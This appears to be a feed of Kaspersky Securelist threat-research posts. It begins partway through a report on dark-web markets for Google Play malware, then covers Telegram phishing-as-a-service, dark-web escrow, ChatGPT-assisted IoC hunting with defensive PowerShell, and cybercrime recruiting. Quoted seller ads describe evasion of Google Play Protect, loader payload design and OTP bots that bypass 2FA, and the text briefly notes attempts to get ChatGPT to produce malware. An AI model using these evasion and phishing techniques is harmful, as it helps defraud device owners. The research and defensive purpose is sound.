Our binder’s main ADVANTAGES:

  • Runtime/scantime FUD

    Runtime cleanness is achieved by encrypting the Android bot with our cryptor BEFORE binding. It is also clear of alerts from Google Protect and built-in antivirus on devices from different vendors.

  • Most recent Android version support

    The binder is compatible with Android 7 and higher

  • Dynamic bot launch

    What is it for? After a successful installation, the victim may tap Done instead of Open, and such installation is of no use. The binder dynamically launches the bot, no matter what the victim taps.

The binder’s main operating principle is that when the legitimate application is launched, it prompts the user to allow installation from unknown sources on a timer using social engineering, so that the bot can be installed. If the user rejects this, they receive another request after some time. Upon successful installation, the binder dynamically launches the bot.

This service is provided manually via jabber.

The advantages and features of binding services listed in sellers’ ads are often similar to those of loaders. Binders usually lack Google Play-related features, though.

Malware obfuscation

The purpose of malware obfuscation is to bypass security systems by complicating malicious code. In this case, the buyer pays either for processing a single application, or for a subscription, for example, once per month. The service provider may even offer discounts for the purchase of packages. For example, one of the sellers offers obfuscation of 50 files for $440, while the cost of processing only one file by the same provider is about $30.

Google Play threat obfuscation offer for $50 apiece

See translation

Hi everyone,

We obfuscate your APK files, so Google Play Protect lets them pass (allowlist certificate).

[IMG link]

This is not our case.

We are now working in manual test mode, later the process will be fully automated.

We offer:

  • manifest morph (packagename, random activities, class, etc.)
  • text string morph on the Smali code level (encryption with random key with Base encoding)
  • resource name morph (optional)
  • manifest and code part obfuscation on the Smali code level
  • complicated trash Smali opcode generation (optional)
  • trusted certificate accepted by Google Play Protect

Output:

  • antivirus check scan to monitor possible false positives
  • encrypted APK

Price:

1 file – $50

Service plans will be available when the site and API are ready

Payment accepted in BTC only

Contacts:

  • email
  • PM

Restrictions:

  • APK max size – 5MB
  • Important! Uploading files obfuscated by our service to VirusTotal is prohibited (checking via hash).
  • Important! The service doesn’t support apps that can damage CIS users (strings are automatically checked against a denylist)
  • Important! The service has the right to refuse app obfuscation without any explanation
  • Important! The service has the right to review the prices in the future

Installations

To increase the number of downloads of a malicious app, many attackers offer to purchase installations by increasing app traffic through Google ads. Unlike other dark web offers, this service is completely legitimate and is used to attract as many downloads of the application as possible, no matter if it is a still-legitimate application or an already poisoned one. Installation costs depend on the targeted country. The average price is $0.5, with offers ranging from $0.1 to $1. In the screenshot below, ads for users from the USA and Australia cost the most — $0.8.

Seller specifies the installation price for each country

See translation

Increase installations of your Android app from Play Market through Google Ads (UAC).

Other services

Dark web sellers also offer to publish the malicious or unwanted app for the buyer. In this case, the buyer does not interact directly with Google Play, but can remotely receive the fruits of the app’s activity, for example, all victim data stolen by it.

Average prices and common rules of sale

Kaspersky experts analyzed the prices in dark web ads offering Google Play-related services, and found that fraudsters accept different payment methods. The services can be provided for a share of the final profit, rented, or sold for a one-time price. Some sellers also hold auctions of their goods: since the number of items sold is limited, they are not very likely to be discovered, so buyers may be willing to compete for them. For example, in one of the auctions we found, the bidding for a Google Play loader started at $1,500, the bid increment (step) was equal to $200, and the “blitz” — the instant purchase price — was $7,000.

Cybercriminals auction a Google Play loader

See translation

Google Play Loader source, ver №2

The loader uses minimum rights, doesn’t require special rights that need permission to be granted, the traffic between the loader and the server is AES-128 encrypted with an encryption key generated once after registration, and a dynamically used initialization vector (IV). Contacts admin panel every 10 seconds. Searches for APK to install every 60 seconds. If an APK is already installed, the loader starts it one time. The loader doesn’t bother users, but subtly asks to install the app. Stable launch after reboot. Adapted for uploading to Google Play. Evasion methods for functionality restrictions on the device are implemented. Offline when the screen is off (loader doesn’t need to stay online). Anti-emulator and Google geo IP check. Blocked in CIS. Convenient admin panel.

The reason for selling I mentioned in the source sale topic.

Variant 2

The payload is a module (dex) file, AES-128 encrypted, injected into the legit app resources. It is loaded when the app is launched (loading into memory, decryption and dumping into the app’s internal storage). Not for Google Play, blocks 80% of apps with Class Dex Loader.

Start: $1,500

Step: $200

Blitz: $7k

The bidding ends in 12 hours after the last bid.

You are welcome to use an escrow service

The offered blitz price is not the highest. Prices for loaders we observed on dark web forums range between $2,000 and $20,000, depending on the malware complexity, novelty and prevalence, as well as the additional functions. The average price for a loader is $6,975.

Example of average offer for a Google Play loader

However, if cybercriminals want to buy the loader source code, the price immediately rockets, reaching the upper limit of the price range.

Seller offers a Google Play loader source code for $20,000

As opposed to a loader, a Google Play developer account (either hacked or newly created by the cybercriminals) can be bought quite cheaply, for example, for $200, and sometimes even for as little as $60. The price depends on the account features, such as the number of already published apps, number of their downloads, etc.

User wants to buy a Google Play account with access to the developer’s email

In addition to the many offers for sale, we also found numerous messages on the dark web about wanting to buy a particular product or service for a certain price.

Cybercriminal looking for a new Google Play loader

User wants to buy a new loader because their developer “went on a binge”

See translation

Need a loader

Enough experience, current coder went on a binge, and we’re in search of an alternative

We know prices and the market, won’t rob you, from $7k to your price

DM your offers

Deposit on our side or with an escrow service

How deals are made

Sellers on the dark web offer whole packages of different tools and services. To keep their activities low-profile, a large percentage of attackers negotiate strictly through private messages on dark web forums or personal messages on social networks and in messengers, for example in Telegram.

It may seem that service providers could easily deceive buyers and make a profit from their apps themselves. Often this is the case. However, it is also common among dark web sellers to maintain their reputation, offer guarantees, or accept payment only after the terms of the agreement have been fulfilled. To reduce risks when making deals, cybercriminals often resort to the services of disinterested intermediaries — escrow services or middlemen. An escrow may be a special service supported by a shadow platform, or a third party with no interest in the outcome of the transaction. Note, however, that on the dark web nothing can completely eliminate the risk of being scammed.

Conclusion and recommendations

We continuously monitor the mobile threat landscape to keep our users safe and informed of the most important developments. Not long ago, we published a report about the threats smartphone users faced in 2022. However, looking at the volume of supply and demand of such threats on the dark web, we can assume that the number of threats in the future will only grow — and become more complex and advanced.

To stay protected from mobile threats:

  • Do not enable the installation of unknown apps. If some app urges you to do it, it is most likely infected. If it is possible, uninstall the app, and scan the device with an antivirus.
  • Check the permissions of the apps that you use and think carefully before granting an app permissions it doesn’t need to perform its main functions, especially when it comes to high-risk permissions such as Accessibility Services. The only permission that a flashlight app needs is to use the flashlight.
  • Use a reliable security solution that can help you to detect malicious apps and adware before they start misbehaving on your device.
  • Update your operating system and important apps as soon as updates become available. To be sure that an app update is benign, enable automatic system scan in your security solution, or scan the device right after the updates are installed.

For organizations, it is necessary to protect their developer accounts with strong passwords and 2FA, as well as monitor the dark web to detect and mitigate credential leaks as early as possible.

To inquire about Kaspersky threat monitoring services for your organization, please contact us at dfi@kaspersky.com.

The Telegram phishing market https://securelist.com/telegram-phishing-services/109383/ https://securelist.com/telegram-phishing-services/109383/#comments Wed, 05 Apr 2023 10:00:17 +0000 https://kasperskycontenthub.com/securelist/?p=109383

Telegram has been gaining popularity with users around the world year by year. Common users are not the only ones who have recognized the messaging app’s handy features — cybercrooks have already made it a branch of the dark web, their Telegram activity soaring since late 2021.

The service is especially popular with phishers. They have become adept at using Telegram both for automating their activities and for providing various services — from selling phishing kits to helping with setting up custom phishing campaigns — to all willing to pay.

To promote their “goods”, phishers create Telegram channels through which they educate their audience about phishing and entertain subscribers with polls like, “What type of personal data do you prefer?”. Links to the channels are spread via YouTube, GitHub and phishing kits they make.

This story covers the variety of phishing services available on Telegram, their details and pricing, and ways of detecting phishing content that originates in Telegram.

The Telegram black market: what’s on offer

After reviewing phishers’ Telegram channels that we detected, we broke down the services they promoted into paid and free.

Free content for aspiring phishers

Automated phishing with Telegram bots

Functional and configurable, Telegram bots help private users and businesses with automating many routine workflows, such as searching for and retrieving information on schedule, answering frequently asked questions from customers, setting up reminders and many others. Malicious actors use Telegram bots to automate illegal activities, such as generating phishing pages or collecting user data.

The process of creating a fake website with a Telegram bot typically includes the following steps:

  1. The wannabe phisher joins the bot creator’s channel.

  2. As a rule, the bot offers to select a language once started. In the example below, the bot speaks English and Arabic.

    Starting a Telegram phishing bot

  3. The bot offers the user to create a new bot of their own and share the token with the main bot. The purpose of this second bot is to capture data of users who follow the phishing links and attempt to log in to the fake website. It is the budding scammer’s job to set up that new bot on Telegram, but that process is also automated and no rocket science.

    Phishing bot asking the user to set up a new bot and share the token

  4. Once the user feeds the token to the first bot, it generates a series of links to fake websites hosted in the same domain. The sites may mimic various services: PUBG, Facebook, PayPal and so on.

    List of off-the-shelf pages in the same domain

Distributing the links is something the wannabe phisher has to do without any help from the bot. If a visitor enters their credentials on the fake page, a notification will be sent to the chat with the bot that our beginning scammer created while generating links to the fake page. The notification will typically contain the phishing link, the victim’s credentials, the name of the country that they logged in from, the country code and the IP address of the device that was used.

Message with the stolen data received by the phisher

Bots that generate phishing pages may differ slightly. For instance, before generating phishing links, one particular bot offers to select a service to mimic and enter a URL the victim will be redirected to after trying to log in. The latter is typically the Google home page or the main page of the service that the phishing page imitates. Once a URL is entered, the bot will generate several scam links targeting users of the service. In this case, victims’ credentials will be sent directly to the phishing bot.

List of services suggested by the bot

What are these fake pages that are so easy to generate? A victim who clicks a link in a message that promises, say, 1,000 likes in TikTok will be presented with a login form that looks like the real thing. The page typically contains nothing besides that form. We filled in the login and password fields in the screenshot below.

Fake TikTok login page generated by the phishing bot

From an engineering standpoint, this is a rather primitive product of a basic phishing kit. When a scammer requests a phishing page from a Telegram bot, the bot forwards the request, along with all the required data, to a utility that assembles pages from predefined packages and returns hyperlinks. To forward the stolen data to the bot, phishing kits include a script into which the following is inserted: the token of the bot that receives user credentials, the identifier of the Telegram chat with that bot, and a URL to redirect the user to after they enter their credentials. Some scripts may lack the URL field.

Script to configure stolen data forwarding to the Telegram bot

By the way, there is no reason why the developer of a phishing kit cannot configure it to grab a copy of the data obtained by the unsuspecting newbie phisher.

Free phishing kits and users’ personal data

Scammer-operated Telegram channels sometimes post what appears to be exceptionally generous offers, for example, zipped up sets of ready-to-use phishing kits that target a large number of global and local brands.

Archive with phishing kits posted in a Telegram scam channel

Contents of a free phishing kit archive

Phishers also share stolen personal data with their subscribers, tagging it with information on whether it was verified or not. “Yellow light data” in the screenshot below stands for “unknown data quality”. This is probably an allusion to the yellow traffic light.

Files containing free credentials of US and Russian users

Why would scammers so generously share valuable data with others instead of using it for their own benefit? One reason is that any free content or manuals so willingly distributed by scammers to their Telegram audience serve as bait of sorts for less experienced phishers to bite. Newbies get a taste of what phishing tools can do, pull off their first scam and wish for more, which is when they will be offered paid content.

Another reason is recruiting an unpaid workforce. As mentioned above, the creators of phishing bots and kits can get access to data collected with tools they made. To attract larger audiences, scam operators advertise their services, promising to teach others how to phish for serious cash.

Ad for a Telegram channel offering phishing content

Besides free phishing kits and bot-powered scams, Telegram fraudsters offer paid phishing pages and data, as well as phishing-as-a-service (PhaaS) subscriptions. The service may include access to phishing tools, as well as guides for beginners and technical support.

Malicious actors offer “premium” phishing and scam pages for sale. Unlike the primitive copies of popular websites, these offers include pages built from scratch with a range of advanced capabilities or tools for generating such pages. For instance, a “premium” page may include elements of social engineering, such as an appealing design, promises of large earnings, an anti-detection system and so on.

Scam pages offered for sale in Telegram

In the screenshot below, the seller promises that each of their “projects” has an anti-bot system, URL encryption, geoblocking and other features that attackers will find useful. The seller goes on to offer custom phishing pages that can include any components requested by the customer.

The seller’s description of advanced phishing page functionalities

After looking closer at these offers, we found that they do contain scripts to block web crawlers and anti-phishing technology. Therefore, these projects are essentially complex or advanced phishing kits.

Contents of a phishing kit archive with an anti-bot system

“Premium page” vendors update their anti-bot systems regularly, so that the phishing content remains undetected and thus usable.

Phishing page vendor announcing the anti-bot system has been updated

Prices for this kind of fake page vary, with some vendors asking $10 per copy and others charging $50 for an archive with several pages in it. A package that includes less frequently offered features, for example, 3-D Secure support and assistance with configuring a fake website, may cost up to $300.

Scam page with 3-D Secure support offered for $280

User personal data for sale

Online banking credentials obtained through phishing techniques are often offered for sale too. Unlike the free data mentioned above, these have been checked, and even the account balances have been extracted. The higher the balance, the more money scammers will typically charge for the credentials.

For example, the same Telegram channel offered the credentials for a bank account with $1,400 in it for $110, whereas access to an account with a balance of $49,000 was put up for $700.

Offer of credentials for an account with a balance of $1,400

Offer of credentials for an account with a balance of $49,000

Phishing-as-a-Service

In addition to one-time sales of phishing kits and user data, scammers use Telegram channels to sell a range of subscriptions with customer support included. Support includes providing updates on a regular basis for the phishing tools, anti-detection systems and links generated by the phishing kits.

An OTP (one-time password) bot is another service available by subscription. Legitimate services use one-time passwords as a second authentication factor. Many organizations enforce a two-factor authentication (2FA) requirement these days, which makes it impossible to hijack an account with just the login and password. Phishers use OTP bots to try and hack 2FA.

The bots call users, posing as the organization maintaining the account that the phishers are trying to hack, and convince them to enter a 2FA code on their phones. The calls are fully automated. The bot then enters the code in a required field, giving the phisher access to the account.

List of OTP bot features and benefits

According to a bot vendor we talked to, a weekly subscription with unlimited calls will set a beginning scammer back $130, while a monthly subscription including bot customization costs as much as $500.

Our chat with the vendor about OTP bot pricing

Another OTP bot is offered on a pay-per-minute, prepaid basis. Rates start at $0.15 per minute depending on the destination. The bot can record calls and store settings, such as the victim’s phone number, name and so on.

OTP bot interface: the victim’s name and phone number, service name and language are required for setting up a call

A customer who shares this information with the bot creators, along with a screenshot showing the victim’s account number, balance and other details, may be rewarded with a small amount added to their OTP bot balance: $5 for two units of information and $10 for three or more.

Some PhaaS vendors take their customers’ trust seriously. In the screenshot below, you can see assurances that all data obtained with paid tools is reliably encrypted, so that neither the vendor nor any third parties can read it. All these vendors want is their customers to remain loyal.

PhaaS vendor explaining to customers that all their data is reliably encrypted

Detection and statistics

Although phishers who offer their services on Telegram use many ways to avoid blocking, our systems detect their fake sites with maximum precision, adding them to our databases.

Malicious sites generated by phishing bots are either hosted in the same domain, or share parts of HTML code, or both. This makes it easy for our cyberthreat detection technology to discover them.

In the above example of a bot generating phishing pages, the same domain was used to host fake websites that mimicked those of various legitimate organizations. We have detected a total of 1,483 attempts to access pages located in that domain since it emerged.
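
As a rough illustration of the second signal (shared HTML), consider the toy sketch below; the URLs are placeholders, and real detection pipelines rely on far more robust features than this simple fragment-hash comparison:

# Toy example: compare two pages by the set of hashed HTML fragments they share
function Get-HtmlFingerprint {
    param([string]$Url)
    $html   = (Invoke-WebRequest -Uri $Url -UseBasicParsing).Content
    # Collapse whitespace, split the markup into coarse chunks, hash each chunk
    $chunks = ($html -replace '\s+', ' ') -split '(?=<)' | Where-Object { $_.Length -gt 40 }
    $sha256 = [System.Security.Cryptography.SHA256]::Create()
    $chunks | ForEach-Object {
        [BitConverter]::ToString($sha256.ComputeHash([Text.Encoding]::UTF8.GetBytes($_)))
    }
}

$a = Get-HtmlFingerprint 'https://suspicious-page-1.example/login'
$b = Get-HtmlFingerprint 'https://suspicious-page-2.example/login'

# Pages assembled from the same phishing kit tend to share a large fraction of chunks
$common = ($a | Where-Object { $b -contains $_ }).Count
$union  = ($a + $b | Sort-Object -Unique).Count
'Shared-HTML similarity: {0:P0}' -f ($common / $union)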

Kaspersky anti-phishing detection statistics for a domain linked to a phishing bot, December 2022 through March 2023 (download)

Since many off-the-shelf phishing solutions offered on Telegram are basic or complex phishing kits, here are some relevant detection statistics on those. In the last six months, our technology has detected 2.5 million malicious URLs generated with phishing kits.

Number of detected malicious URLs generated with phishing kits, October 2022 through March 2023 (download)

We prevented 7.1 million attempts by users to access these malicious sites within the same period.

Kaspersky anti-phishing detection statistics for pages generated with phishing kits, October 2022 through March 2023 (download)

Takeaways

Wannabe phishers used to need to find a way onto the dark web, study the forums there, and do other things to get started. The threshold for joining the phisher community lowered once malicious actors migrated to Telegram, where they now share insights and knowledge, often for free, right there in the popular messaging service.

Even the laziest and most cash-strapped can use Telegram bots offered by channel owners to generate phishing pages and obtain data stolen from their victims. Some attackers upload archives with data for anyone to make use of. An aspiring phisher who wishes to generate a greater variety of content can download phishing kits that target a wide range of organizations.

Scammers use an array of free offers to promote paid services. They are also likely manipulating newcomers into using their free phishing kits and bots, which can potentially share stolen data with their creators.

The more solvent audience is offered phishing pages with geoblocking functionality and regularly updated anti-bot systems, which are harder to detect than those generated with basic phishing kits and bots. Prices range from $10 to $300 and depend on the feature set. Phishers also sell stolen online banking credentials and offer OTP bot subscriptions that can be used to bypass 2FA.

A detailed review of available offers on Telegram phishing channels suggests that the bulk of these consists of phishing kits, which our technology successfully blocks: over the last six months, we have detected 2.5 million pages generated with phishing kits.

Business on the dark web: deals and regulatory mechanisms https://securelist.com/dark-web-deals-and-regulations/109034/ https://securelist.com/dark-web-deals-and-regulations/109034/#respond Wed, 15 Mar 2023 10:00:35 +0000 https://kasperskycontenthub.com/securelist/?p=109034

Download the full version of the report (PDF)

Hundreds of deals are struck on the dark web every day: cybercriminals buy and sell data, provide illegal services to one another, hire other individuals to work as “employees” with their groups, and so on. Large sums of money are often on the table. To protect themselves from significant losses, cybercriminals use regulatory mechanisms, such as escrow services (aka middlemen, intermediaries, or guarantors), and arbitration. Escrow services control the fulfillment of agreements and reduce the risks of fraud in nearly every type of deal; arbiters act as a kind of court of law for cases where one of the parties to the deal tries to deceive the other(s). The administrators of the dark web sites, in turn, enforce arbiters’ decisions and apply penalties to punish cheaters. Most often, these measures consist of blocking, banning, or adding offenders to “fraudster” lists available to any member of the community.

Our research

We have studied publications on the dark web about deals involving escrow services for the period from January 2020 through December 2022. The sample includes messages from international forums and marketplaces on the dark web, as well as from publicly available Telegram channels used by cybercriminals. The total number of messages mentioning the use of an escrow agent in one way or another amounted to more than one million, of which almost 313,000 messages were published in 2022.

Dynamics of the number of messages on shadow sites mentioning escrow services in 2022. Source: Kaspersky Digital Footprint Intelligence (download)

We also found and analyzed the rules of operating escrow services on more than ten popular dark web sites. We found that the rules and procedures for conducting transactions protected by escrow were almost the same across various shadow platforms, and that transactions involving escrow services followed a typical pattern.

Besides the posts relating to escrow services, we analyzed those relating to arbitration and dispute settlement. We found that the format for arbitration appeals was also standardized. It usually included information about the parties, the value of the deal, a brief description of the situation, and the claimant’s expectations. In addition, parties sent their evidence privately to the appointed arbiter.

What we learned about dark web deal regulation

  • About half of the messages that mention the use of an escrow agent in one way or another in 2022 were posted on a platform specializing in cashing out and associated services.
  • Cybercriminals resort to escrow services—provided by escrow agents, intermediaries who are not interested in the outcome of the deal—not just for one-time deals, but also when looking for long-term partners or hiring “employees”.
  • These days, dark web forums create automated escrow systems to speed up and simplify relatively typical deals between cybercriminals.
  • Any party may sabotage the deal: the seller, the buyer, the escrow agent, and even third parties using fake accounts to impersonate official representatives of popular dark web sites or escrow agents.
  • The main motivation for complying with an agreement and playing fair is the party’s reputation in the cybercriminal community.
  • A deal may involve up to five parties: the seller, the buyer, the escrow agent, the arbiter, and the administrators of the dark web site. Moreover, further arbiters may be involved if a party is not satisfied with the appointed arbiter’s decision and tries to appeal to another.

The reasons to learn how business works on the dark web

Understanding how the dark web community operates, how cybercriminals interact with one another, what kinds of deals there are, how they are made, and what roles exist in them, is important when searching for information on the dark web and subsequently analyzing the data to identify possible threats to companies, government agencies, or certain groups of people. It helps information security experts find information faster and more efficiently without revealing themselves.

Today, regular monitoring of the dark web for various cyberthreats — both attacks in the planning stages and incidents that have already occurred, such as compromise of corporate networks or leakage of confidential documents — is essential for countering threats in time and mitigating the consequences of fraudulent or malicious activities. As the saying goes, forewarned is forearmed.

Business on the dark web: deals and regulatory mechanisms — download the full version of the report (English, PDF)

IoC detection experiments with ChatGPT https://securelist.com/ioc-detection-experiments-with-chatgpt/108756/ https://securelist.com/ioc-detection-experiments-with-chatgpt/108756/#comments Wed, 15 Feb 2023 10:00:53 +0000 https://kasperskycontenthub.com/securelist/?p=108756

ChatGPT is a groundbreaking chatbot powered by the neural network-based language model text-davinci-003 and trained on a large dataset of text from the Internet. It is capable of generating human-like text in a wide range of styles and formats.

ChatGPT can be fine-tuned for specific tasks, such as answering questions, summarizing text, and even solving cybersecurity-related problems, such as generating incident reports or interpreting decompiled code. Apparently, attempts have been made to generate malicious objects, such as phishing emails, and even polymorphic malware.

It is common for security and threat researchers to publicly disclose the results of their investigations (adversary indicators, tactics, techniques, and procedures) in the form of reports, presentations, blog articles, tweets, and other types of content.

Therefore, we initially decided to check what ChatGPT already knows about threat research and whether it can help with identifying simple, well-known adversary tools like Mimikatz and Fast Reverse Proxy, and spotting the common renaming tactic. The output looked promising!

What about classic indicators of compromise, such as well-known malicious hashes and domains? Unfortunately, during our quick experiment, ChatGPT was not able to produce satisfying results: it failed to identify the well-known hash of Wannacry (hash: 5bef35496fcbdbe841c82f4d1ab8b7c2).

For various APT1 domains, ChatGPT produced a list of mostly the same legitimate domains — or is it that we may not know something about these domains? — even though it provided descriptions of the APT actors.

As for FIN7 domains, it correctly classified them as malicious, although the reason it gave was, “the domain name is likely an attempt to trick users into believing that it is a legitimate domain”, rather than there being well-known indicators of compromise.

While the last experiment, which targeted domains that mimicked a well-known website, gave an interesting result, more research is needed: it is hard to say why ChatGPT produces better results for host-based artifacts than for simple indicators like domain names and hashes. Certain filters might have been applied to the training dataset, or the questions themselves should be constructed in a different way (a problem well-defined is a problem half-solved!).

Anyway, since the responses for host-based artifacts looked more promising, we instructed ChatGPT to write some code to extract various metadata from a test Windows system and then to ask itself whether the metadata was an indicator of compromise:

Certain code snippets were handier than others, so we decided to continue developing this proof of concept manually: we filtered the output for events where the ChatGPT response contained a “yes” statement regarding the presence of an indicator of compromise, added exception handlers and CSV reports, fixed small bugs, and converted the snippets into individual cmdlets, which produced a simple IoC scanner, HuntWithChatGPT.psm1, capable of scanning a remote system via WinRM:

Cmdlets included in HuntWithChatGPT.psm1:

  • Get-ChatGPTAutorunsIoC: modules configured to run automatically (Autoruns/ASEP)
  • Get-ChatGPTRunningProcessesIoC: running processes and their command lines
  • Get-ChatGPTServiceIoC: service installation events (event ID 7045)
  • Get-ChatGPTProcessCreationIoC: process creation event ID 4688 from the Security log
  • Get-ChatGPTSysmonProcessCreationIoC: process creation event ID 1 from the Sysmon log
  • Get-ChatGPTPowerShellScriptBlockIoC: PowerShell script blocks (event ID 4104 from Microsoft-Windows-PowerShell/Operational)
  • Get-ChatGPTIoCScanResults: runs all functions one by one and generates reports

The main cmdlet, Get-ChatGPTIoCScanResults, has the following syntax:
Get-ChatGPTIoCScanResults
    -apiKey <Object>
        OpenAI API key https://beta.openai.com/docs/api-reference/authentication
       
    -SkipWarning [<SwitchParameter>]
        
    -Path <Object>
        
    -IoCOnly [<SwitchParameter>]
        Export only Indicators of compromise
        
    -ComputerName <Object>
        Remote Computer's Name
        
    -Credential <Object>
        Remote Computer's credentials
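
For reference, a typical invocation of the scanner against a remote host over WinRM might look like the sketch below (the host name is a placeholder, and the assumption that -Path points to a folder for the resulting CSV reports is ours):

Import-Module .\HuntWithChatGPT.psm1

$cred = Get-Credential                      # account allowed to connect to the target via WinRM
Get-ChatGPTIoCScanResults -apiKey $env:OPENAI_API_KEY `
                          -ComputerName 'ws01.corp.example' `
                          -Credential $cred `
                          -Path .\scan-results `
                          -IoCOnly          # export only entries flagged as indicators of compromise
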
We infected the target system with the Meterpreter and PowerShell Empire agents, and emulated a few typical adversary procedures. Upon executing the scanner against the target system, it produced a scan report enriched with ChatGPT conclusions:

Two malicious running processes were identified correctly out of 137 benign processes, without any false positives.

Note that ChatGPT provided a reason why it concluded that the metadata were indicators of compromise, such as “command line is attempting to download a file from an external server” or “it is using the “-ep bypass” flag which tells PowerShell to bypass security checks that are normally in place”.

For service installation events, we slightly modified the question to instruct ChatGPT to “think step by step”, so that it would slow down and avoid cognitive bias, as advised by multiple researchers on Twitter:

Is following Windows service name ‘$ServiceName’ with following Launch String ‘$Servicecmd’ – an indicator of compromise? Think about it step by step.
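A prompt like this can be assembled straight from the System event log. The sketch below is an assumption about how such a cmdlet might do it; the property indices used to extract the service name and launch string from event ID 7045 are assumed from the standard Service Control Manager event layout.

# Sketch: build the "think step by step" question for each service installation event.
$events = Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045 }

foreach ($e in $events) {
    $ServiceName = $e.Properties[0].Value   # ServiceName field of event 7045 (assumed index)
    $Servicecmd  = $e.Properties[1].Value   # ImagePath (launch string) field (assumed index)

    $question = "Is following Windows service name '$ServiceName' with following " +
                "Launch String '$Servicecmd' - an indicator of compromise? " +
                "Think about it step by step."
    $question   # this string is then sent to the OpenAI API as in the earlier sketch
}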

ChatGPT successfully identified suspicious service installations, without false positives. It produced a valid hypothesis that “the code is being used to disable logging or other security measures on a Windows system”. For the second service, it provided a conclusion about why the service should be classified as an indicator of compromise: “these two pieces of information indicate that the Windows service and launch string may be associated with some form of malware or other malicious activity and should therefore be considered an indicator of compromise”.

The process creation events in Sysmon and Security logs were analyzed with the help of the corresponding PowerShell cmdlets Get-ChatGPTSysmonProcessCreationIoC and Get-ChatGPTProcessCreationIoC. The final report highlighted some of the events as malicious:

  • ChatGPT identified the suspicious pattern in the ActiveX code: “The command line includes commands to launch a new process (svchost.exe) and terminate the current one (rundll32.exe)”.
  • It correctly characterized the lsass process dump attempt: “a.exe file is being run with elevated privileges and using lsass (which stands for Local Security Authority Subsystem Service) as its target; Finally, dbg.dmp indicates that a memory dump is being created while running a debug program”.
  • It detected the Sysmon driver unload: “the command line includes instructions to unload a system monitoring driver”.

While checking the PowerShell Script blocks, we modified the question to check not only for indicators, but also for presence of obfuscation techniques:

Is following PowerShell script obfuscated or contains indicators of compromise? ‘$ScriptBlockText’
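As before, the script block text can be pulled from the Microsoft-Windows-PowerShell/Operational log and substituted into the question. A rough sketch follows; the property index for the ScriptBlockText field is an assumption.

# Sketch: collect PowerShell script blocks (event ID 4104) and prepare the question.
$blocks = Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-PowerShell/Operational'
    Id      = 4104
}

foreach ($b in $blocks) {
    $ScriptBlockText = $b.Properties[2].Value   # assumed index of the ScriptBlockText field

    $question = "Is following PowerShell script obfuscated or contains indicators " +
                "of compromise? '$ScriptBlockText'"
    $question   # sent to the OpenAI API as in the earlier sketches
}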

ChatGPT not only detected obfuscation techniques, but also enumerated a few: XOR encryption, Base64 encoding, and variable substitution.

Okay, what about false positives or false negatives? Of course, this tool is not perfect and produces both.

In one example, ChatGPT did not detect credentials exfiltration through SAM registry dumping, and in another, described the lsass.exe process as possibly indicative of “malicious activity or a security risk such as malware running on the system”:

An interesting outcome of this experiment is the reduction of data in the dataset. After the adversary emulation on the test system, the number of events the analyst had to verify was reduced significantly:

System metadata                | Events in dataset | Highlighted by ChatGPT | False positives
Running Processes              | 137               | 2                      | 0
Service Installations          | 12                | 7                      | 0
Process Creation Events        | 1033              | 36                     | 15
Sysmon Process Creation events | 474               | 24                     | 1
PowerShell ScriptBlocks        | 509               | 1                      | 0
Autoruns                       | 1412              | 4                      | 1

Note that tests were performed on a fresh non-production system. Production will likely generate more false positives.

Conclusions

While this exact implementation of IoC scanning may not currently be a very cost-effective solution (roughly $15–25 per host in OpenAI API charges), it shows interesting interim results and reveals opportunities for future research and testing. Potential use cases that we noted during the research were as follows:

  • Checking systems for indicators of compromise, especially if you do not yet have an EDR full of detection rules and need to do some digital forensics and incident response (DFIR);
  • Comparing a current signature-based rule set with ChatGPT output to identify gaps: there could always be a technique or procedure that you as an analyst do not know about or have forgotten to write a signature for;
  • Detecting code obfuscation;
  • Similarity detection: feeding malware binaries to ChatGPT and asking it whether a new one is similar to known samples.

A correctly asked question is half the answer—experimenting with various statements in the question and model parameters may produce more valuable results even for hashes and domain names.

Beware of the false positives and false negatives that this approach can produce. At the end of the day, it is just another statistical neural network, prone to producing unexpected results.

Download the scripts here to hunt for IoCs. ATTENTION! By using these scripts, you send data, including sensitive data, to OpenAI, so be careful and consult the system owner beforehand.

 

1 Kaspersky’s opinion on the attribution might differ from ChatGPT’s. We leave it to local and international law enforcement agencies to validate the attribution.

Come to the dark side: hunting IT professionals on the dark web https://securelist.com/darknet-it-headhunting/108526/ https://securelist.com/darknet-it-headhunting/108526/#respond Mon, 30 Jan 2023 10:00:30 +0000 https://kasperskycontenthub.com/securelist/?p=108526

The dark web is a collective name for a variety of websites and marketplaces that bring together individuals willing to engage in illicit or shady activities. Dark web forums contain ads for selling and buying stolen data, offers to code malware and hack websites, posts seeking like-minded individuals to participate in attacks on companies, and many more.

Just as any other business, cybercrime needs labor. New team members to participate in cyberattacks and other illegal activities are recruited right where the business is done – on the dark web. We reviewed job ads and resumes that were posted on 155 dark web forums from January 2020 through June 2022 and analyzed those containing information about a long-term engagement or a full-time job.

This post covers the peculiarities of this kind of employment, terms, candidate selection criteria, and compensation levels. Further information, along with an analysis of the most popular IT jobs on the dark web, can be found in the full version of the report.

Key outcomes

Our analysis of the dark web job market found:

  • The greatest number of ads were posted in March 2020, which was likely related to the outbreak of the COVID-19 pandemic and the ensuing changes in the structure of the job market.
  • The major dark web employers are hacker teams and APT groups looking for those capable of developing and spreading malware code, building and maintaining IT infrastructure, and so on.
  • Job ads seeking developers are the most frequent ones, at 61% of the total.
  • Developers also topped the list of the best-paid dark web IT jobs: the highest advertised monthly salary figure we saw in an ad for a developer was $20,000.
  • The median levels of pay offered to IT professionals varied between $1,300 and $4,000.
  • The highest median salary of $4,000 could be found in ads for reverse engineers.

The dark web job market

Most dark web employers offer semi-legal and illegal jobs, but there are ads with potentially legal job offers that comply with national laws. An example is creating IT learning courses.

Sketchy employment arrangements can border on the illegal and sometimes go against the law. An example of a dubious job is selling questionable drugs for profit on fraudulent websites.

Dirty jobs are illegal and often constitute a criminal offense. An individual engaged in these can be prosecuted and jailed if caught. Fraudulent schemes or hacking websites, social network accounts and corporate IT infrastructure all qualify as dirty jobs.

Offers like that come from hacker groups, among others. Cybercrooks need a staff of professionals with specific skills to penetrate the infrastructure of an organization, steal confidential data, or encrypt the system for subsequent extortion.

Attack team coordination diagram

